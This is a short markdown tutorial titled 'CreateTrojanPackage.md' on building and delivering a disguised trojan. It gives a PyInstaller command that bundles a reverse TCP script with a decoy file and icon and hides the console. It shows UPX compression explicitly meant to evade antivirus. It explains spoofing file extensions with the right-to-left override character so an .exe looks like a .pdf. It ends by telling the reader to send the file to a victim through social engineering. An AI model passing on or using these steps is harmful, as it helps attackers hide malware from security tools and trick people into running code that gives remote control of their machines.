CreateTrojanPackage.md

Packaging Trojans with any file

Using App Data

Steps

• Install Pyinstaller

• Downloading Icon :

  • Download Icon from IconFinder
  • set filters to free and choose high resolution.
  • download icon

• Changing downloaded png to ico

  • Visit ICO convert or OnlineConvert.com
  • Upload image
  • choose desired settings
  • convert and download ico file

• If using requests use 2.5.1

  pyinstaller --add-data "path_to_front_file;." --icon "full_icon_path" --one-file --noconsole -n "name_of_output_file" "path_to_reverse_tcp.py"

Bypassing AV using UPX

• Download UPX

• Extract files

• Use UPX to compress pyinstaller generated executable

• Syntax:

  ./upx "full_path_of_executable" -o "full_path_of_compressed_executable"

Spoofing File Type

• Copy Right to left override character (U+202E). copy from below or from unicode-explorer website

  ‮ 
  

• file_name-(type_everything_in_reverse_order) and paste copied character after -.

  • eg : sample_pdf-fdp.exe
    • file_name : sample_pdf
    • spoofing_extension : pdf
    • reverse order of spoofing extension : fdp
    • file_extension : exe
  • spoofed file_name : sample_pdf-‮fdp.exe

• Search words ending with exe (if windows executable) and remove - to make trojan to look like a real file.

  • word ending with exe : alexe
  • spoofed file_name : spoofed_alexe.pdf
  • actual file_name : spoofed_alfdp.exe

Send File to victim

• Send file to victim through using attacks or social engineering.